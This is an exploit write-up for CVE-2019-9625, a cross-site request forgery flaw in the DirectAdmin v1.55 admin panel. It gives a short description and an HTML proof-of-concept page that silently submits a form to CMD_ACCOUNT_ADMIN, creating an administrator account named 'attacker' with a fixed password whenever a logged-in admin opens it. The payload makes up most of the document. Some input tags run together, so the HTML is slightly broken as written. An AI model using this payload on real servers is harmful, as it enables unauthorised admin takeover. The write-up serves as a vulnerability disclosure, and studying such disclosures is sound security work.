# Exploit title: DirectAdmin v1.55 - CSRF via CMD_ACCOUNT_ADMIN Admin Panel# Date: 03/03/2019# Exploit Author: ManhNho# Vendor Homepage: https://www.directadmin.com/# Software Link: https://www.directadmin.com/# Demo Link: https://www.directadmin.com:2222/CMD_ACCOUNT_ADMIN# Version: 1.55# CVE: CVE-2019-9625# Tested on: Windows 10 / Kali Linux# Category: Webapps#1. Description-----------------------------------------------------
DirectAdmin v 1.55 have CSRF via CMD_ACCOUNT_ADMIN Admin Panel lead to
create new admin account
#2. PoC-----------------------------------------------------
a) Send below crafted request to logged in user who is having admin
Administrator level access
<html><body><script>history.pushState('','','/')</script><form action="https://server:2222/CMD_ACCOUNT_ADMIN" method="POST"><inputtype="hidden" name="fakeusernameremembered" value=""/><inputtype="hidden" name="fakepasswordremembered" value=""/><inputtype="hidden" name="action" value="create"/><inputtype="hidden" name="username" value="attacker"/><inputtype="hidden" name="email" value="attacker@mail.com"/><inputtype="hidden" name="passwd" value="123456"/><inputtype="hidden" name="passwd2" value="123456"/><inputtype="hidden" name="notify" value="yes"/><inputtype="submit" value="Submit request"/></form></body></html>
b) Once the logged in user opens the URL the form will get submitted
with active session ofadministrator and action get performed
successfully.#3. References-----------------------------------------------------
https://github.com/ManhNho/CVEs/blob/master/New-Requests/DirectAdmin-CSRF
https://nvd.nist.gov/vuln/detail/CVE-2019-9625